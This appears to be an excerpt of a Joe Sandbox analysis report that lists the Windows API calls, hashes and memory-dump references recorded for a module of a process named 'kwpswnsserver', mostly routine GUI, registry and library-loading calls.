                                                                  • GetSystemMetrics.USER32(00000020), ref: 6C93BCFC
                                                                  • GetSystemMetrics.USER32(00000021), ref: 6C93BD06
                                                                  • GetSystemMetrics.USER32(00000005), ref: 6C93BD15
                                                                  • GetSystemMetrics.USER32(00000006), ref: 6C93BD1F
                                                                  • GetSystemMetrics.USER32(0000005C), ref: 6C93BD36
                                                                  • GetSystemMetrics.USER32(0000005C), ref: 6C93BD40
                                                                  • GetSystemMetrics.USER32(00000007), ref: 6C93BD58
                                                                  • GetSystemMetrics.USER32(00000008), ref: 6C93BD62
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  APIs
                                                                  • GlobalSize.KERNEL32(?), ref: 6C8980F0
                                                                  • GlobalAlloc.KERNEL32(00002002,00000000,?,?,6C898063,?,?,00000054), ref: 6C898108
                                                                  • GlobalLock.KERNEL32(?), ref: 6C898118
                                                                  • GlobalLock.KERNEL32(?), ref: 6C898121
                                                                  • GlobalSize.KERNEL32(?), ref: 6C89812E
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C89813F
                                                                  • GlobalUnlock.KERNEL32(?), ref: 6C898148
                                                                  • GlobalSize.KERNEL32(?), ref: 6C898158
                                                                  Similarity
                                                                  • API ID: Global$Size$LockUnlock$Alloc
                                                                  • String ID:
                                                                  • API String ID: 2344174106-0
                                                                  • Opcode ID: 3668046e02a6b4027088317d0be786b9d637d6558071f51ba36404e94db33aab
                                                                  • Instruction ID: 6d65baaeb771103fccc9c434a2aff5101b5d7390c421afe01b358f75dedfce58
                                                                  • Opcode Fuzzy Hash: 3668046e02a6b4027088317d0be786b9d637d6558071f51ba36404e94db33aab
                                                                  • Instruction Fuzzy Hash: D6014872701326BFDB257BB58D9EC5B7F7CEB063997018A25FD0AD3201D6358E0196A0
                                                                  APIs
                                                                  • OffsetRect.USER32(?,00000000,?), ref: 6C886510
                                                                  • OffsetRect.USER32(?,?,00000000), ref: 6C886530
                                                                  • SetCapture.USER32(?), ref: 6C8865A3
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000180,00000000), ref: 6C8865C2
                                                                  • ReleaseCapture.USER32 ref: 6C886650
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 6C8866C6
                                                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 6C8866D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: OffsetRect$Capture$RedrawReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 1110970518-0
                                                                  • Opcode ID: d86afb4662383546b9d420dc067ea1a78e29a53bd8240038a20651dae7a70297
                                                                  • Instruction ID: cec33ab83b5c9ef83923b6821fb11b7cc4590e93b3ad9c105c63e173f99ce170
                                                                  • Opcode Fuzzy Hash: d86afb4662383546b9d420dc067ea1a78e29a53bd8240038a20651dae7a70297
                                                                  • Instruction Fuzzy Hash: D8D17D357002299FCF189F28C998BAD37B5BF89314F5446B9ED0ADB785DB70AC018B94
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA0A2
                                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,?,?,00000000), ref: 6C8CA127
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA181
                                                                  • GetTextColor.GDI32(?), ref: 6C8CA18C
                                                                  • OffsetRect.USER32(?,00000001,00000001), ref: 6C8CA1D6
                                                                    • Part of subcall function 6C880847: __EH_prolog3.LIBCMT ref: 6C88084E
                                                                    • Part of subcall function 6C883B86: SetTextAlign.GDI32(?,?), ref: 6C883B9C
                                                                    • Part of subcall function 6C883B86: SetTextAlign.GDI32(00000000,00000000), ref: 6C883BAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Text$H_prolog3$Align$ColorOffsetRect
                                                                  • String ID:
                                                                  • API String ID: 2099682203-0
                                                                  • Opcode ID: 37fda04c55e23819478464551c0676bebc222de706089550aa0e28376299ab24
                                                                  • Instruction ID: f1d8c703cded36683afb8ee9f8a22e6230ab2877255d010a067509bf3029a34d
                                                                  • Opcode Fuzzy Hash: 37fda04c55e23819478464551c0676bebc222de706089550aa0e28376299ab24
                                                                  • Instruction Fuzzy Hash: 6661BD31601219AFCF14DFA8CD44BEE7379BF0831AF108865E911ABA90DB74ED45CBA1
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C99C38E
                                                                    • Part of subcall function 6C99C651: OleGetClipboard.OLE32(00000000), ref: 6C99C667
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C412
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C459
                                                                  • ReleaseStgMedium.OLE32(?), ref: 6C99C468
                                                                  • CoTaskMemFree.OLE32(?,?,00000000,?,00000040,6C90713C,?,00000000,00000000,0000005C), ref: 6C99C518
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask
                                                                  • String ID: '
                                                                  • API String ID: 3213536121-1997036262
                                                                  • Opcode ID: 7a4ff1501eff21beb55bde49787e0aa270ce62d6631e25e36752f4c69e768021
                                                                  • Instruction ID: f32635301b636a5e968f8a4172d1f2e6e97b30991b6c1c995ab2d5eef649fa85
                                                                  • Opcode Fuzzy Hash: 7a4ff1501eff21beb55bde49787e0aa270ce62d6631e25e36752f4c69e768021
                                                                  • Instruction Fuzzy Hash: 16519231A05209DBDF14EFB8CD44AEDBBB9AF49318F184029E911F7A80EB74D945CB61
                                                                  APIs
                                                                    • Part of subcall function 6C8BD649: IsWindow.USER32(?), ref: 6C8BD655
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89248B
                                                                    • Part of subcall function 6C8BDCC7: GetClientRect.USER32(?,?), ref: 6C8BDCEF
                                                                    • Part of subcall function 6C8BDCC7: PtInRect.USER32(?,00000000,?), ref: 6C8BDD09
                                                                  • ScreenToClient.USER32(?,?), ref: 6C892358
                                                                  • PtInRect.USER32(?,?,?), ref: 6C89236B
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89239D
                                                                  • GetParent.USER32(?), ref: 6C8923CD
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C89244B
                                                                  • GetFocus.USER32 ref: 6C892451
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageRectSend$Client$FocusParentScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1639644240-0
                                                                  • Opcode ID: 1a63ea607b21b80de91aeca034c11278dee6353dd773293c78f94faf66d9be16
                                                                  • Instruction ID: 7bf35ed9e6f13f2b330a31cd5bd8c142a980f99e1376a754b2b185b65aba99a8
                                                                  • Opcode Fuzzy Hash: 1a63ea607b21b80de91aeca034c11278dee6353dd773293c78f94faf66d9be16
                                                                  • Instruction Fuzzy Hash: F451D4B1A4021AAFCF24DF6DCE48A9E7BB8FF49308B104969E855E7751DB34D900CB90
                                                                  APIs
                                                                    • Part of subcall function 6C9070F4: __EH_prolog3_catch.LIBCMT ref: 6C9070FB
                                                                  • UpdateWindow.USER32(?), ref: 6C8B4482
                                                                  • EqualRect.USER32(?,?), ref: 6C8B44C2
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B44DA
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B44E9
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B4500
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B4512
                                                                  • UpdateWindow.USER32(?), ref: 6C8B451B
                                                                    • Part of subcall function 6C8B2BFA: InvalidateRect.USER32(?,?,00000001,?), ref: 6C8B2C71
                                                                    • Part of subcall function 6C8B2BFA: InflateRect.USER32(?,00000000,?), ref: 6C8B2CB7
                                                                    • Part of subcall function 6C8B2BFA: RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C8B2CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                                  • String ID:
                                                                  • API String ID: 1041772997-0
                                                                  • Opcode ID: 75ce80b8613deea935ac3fa03fc1b3db1ce0bb0708a6988c0b7e2fd8d5b7af71
                                                                  • Instruction ID: 3162048ea706ef1b2ec8c8a61f374dfba54b000a1ad53ba44fe8d6c21ab263eb
                                                                  • Opcode Fuzzy Hash: 75ce80b8613deea935ac3fa03fc1b3db1ce0bb0708a6988c0b7e2fd8d5b7af71
                                                                  • Instruction Fuzzy Hash: 2D51B07560021A9FCF15DF24C985BAE3BB5BF89314F144679EC1AEB391DB709901CBA0
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C2947
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6C9C294F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C29D8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6C9C2A03
                                                                  • _ValidateLocalCookies.LIBCMT ref: 6C9C2A58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: eae8f516d1288690708f7c1a380dcd23a378ae2ee74a2f18575cd93cddf83d60
                                                                  • Instruction ID: d338a62b5206dcde7e07ec8e1ec30ae0cf4576b585f40e9d6726bbc760203023
                                                                  • Opcode Fuzzy Hash: eae8f516d1288690708f7c1a380dcd23a378ae2ee74a2f18575cd93cddf83d60
                                                                  • Instruction Fuzzy Hash: 7C41D334B00A199BCF00DF68C888ADE7BB5BF55328F11D155E819AB791DB31EA05CB93
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A2105
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C8A2134
                                                                  • GetClientRect.USER32(?,?), ref: 6C8A2151
                                                                  • SelectObject.GDI32(?,?), ref: 6C8A218A
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 6C8A21B1
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C8A2237
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C8A2245
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$ClientCompatibleCreateH_prolog3_Rect
                                                                  • String ID:
                                                                  • API String ID: 1651110115-0
                                                                  • Opcode ID: cdd4cfd8cabdbd37eaa3f68612257718eecd5aa02dce88a60612828e2cff45c9
                                                                  • Instruction ID: a3c815d9e968aaaf048caf5ec71200bcfa6db4b7c64cedc57d372af471f04400
                                                                  • Opcode Fuzzy Hash: cdd4cfd8cabdbd37eaa3f68612257718eecd5aa02dce88a60612828e2cff45c9
                                                                  • Instruction Fuzzy Hash: 0841F671A00219AFDF24DBA8CE95FEEBBB9BF58704F108129F105A3690DB746D05CB60
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C880C9C
                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 6C880CF6
                                                                  • IsAppThemed.UXTHEME(?,?,00000001,?), ref: 6C880D87
                                                                  • GetStockObject.GDI32(00000005), ref: 6C880D98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClassH_prolog3_NameObjectStockThemed
                                                                  • String ID: Button$Static
                                                                  • API String ID: 2434646892-2498952662
                                                                  • Opcode ID: 5aefcff439a32f99ff4099f4b1ebac36bed63fc8165b0a8ffaedb7a023b08bfa
                                                                  • Instruction ID: 76525eb6dd5ce3d03ba38c4fe6e2c35473ffb35ba49d47748ba706a203d961e5
                                                                  • Opcode Fuzzy Hash: 5aefcff439a32f99ff4099f4b1ebac36bed63fc8165b0a8ffaedb7a023b08bfa
                                                                  • Instruction Fuzzy Hash: 2231C4319476599FCB34DF58CE88BDA7374AF15319F100AA8E81997E90DB30AD84CB61
                                                                  APIs
                                                                  • FillRect.USER32(?,?,-000000A0), ref: 6C8CC81F
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8CC82D
                                                                  • PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 6C8CC853
                                                                  • PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 6C8CC86C
                                                                  • PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 6C8CC885
                                                                  • PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 6C8CC8A1
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CC8C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Fill$Inflate
                                                                  • String ID:
                                                                  • API String ID: 2224923502-0
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000,00000000,?,00000000), ref: 6C89AD28
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 6C89AD54
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 6C89AD80
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89AD92
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89ADA1
                                                                    • Part of subcall function 6C89A5BA: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89A5CB
                                                                    • Part of subcall function 6C89A5BA: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C89A5DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                  • String ID: software
                                                                  • API String ID: 550756860-2010147023
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C900DF8
                                                                    • Part of subcall function 6C900EE2: __EH_prolog3.LIBCMT ref: 6C900EE9
                                                                    • Part of subcall function 6C900EE2: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C900F3C
                                                                    • Part of subcall function 6C900EE2: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C900F52
                                                                  • CopyRect.USER32(?,?), ref: 6C900E2D
                                                                  • GetCursorPos.USER32(?), ref: 6C900E3F
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 6C900E52
                                                                  • IsRectEmpty.USER32(?), ref: 6C900E6D
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C900E7F
                                                                  • DoDragDrop.OLE32(00000000,00000000,?,?), ref: 6C900EC7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
                                                                  • String ID:
                                                                  • API String ID: 1837043813-0
                                                                  APIs
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8C6E13
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C6E25
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C6E33
                                                                  • SetRectEmpty.USER32(?), ref: 6C8C6E5B
                                                                  • GetDesktopWindow.USER32 ref: 6C8C6E73
                                                                  • LockWindowUpdate.USER32(?,00000000), ref: 6C8C6E84
                                                                  • GetDCEx.USER32(?,00000000,00000003), ref: 6C8C6E9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                  • String ID:
                                                                  • API String ID: 1192691108-0
                                                                  APIs
                                                                  • RealChildWindowFromPoint.USER32(?,?,?,?,?,?,6C887DD8,?,?,?), ref: 6C8A02AA
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A02C4
                                                                  • GetWindow.USER32(?,00000005), ref: 6C8A0316
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$ChildClientFromPointRealScreen
                                                                  • String ID:
                                                                  • API String ID: 2518355518-0
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C88E974
                                                                  • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 6C88E99C
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 6C88E9AE
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 6C88E9BA
                                                                  • LockResource.KERNEL32(00000000), ref: 6C88E9C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeofWindow
                                                                  • String ID: AFX_DIALOG_LAYOUT
                                                                  • API String ID: 2582447065-2436846380
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A6611
                                                                  • GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 6C8A6621
                                                                  • EncodePointer.KERNEL32(00000000,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A662A
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A6638
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BeginBufferedPaint$uxtheme.dll
                                                                  • API String ID: 2061474489-1632326970
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C8A696C
                                                                  • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C8A697C
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6985
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6993
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: TaskDialogIndirect$comctl32.dll
                                                                  • API String ID: 2061474489-2809879075
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C8A6421
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C8A6431
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A643A
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6448
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: SHGetKnownFolderPath$shell32.dll
                                                                  • API String ID: 2061474489-2936008475
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899BF,?,?,?,?), ref: 6C8A624A
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6C8A625A
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899BF,?,?,?,?), ref: 6C8A6263
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899BF,?,?,?,?), ref: 6C8A6271
                                                                  Strings
                                                                  • RegisterApplicationRecoveryCallback, xrefs: 6C8A6254
                                                                  • kernel32.dll, xrefs: 6C8A6245
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
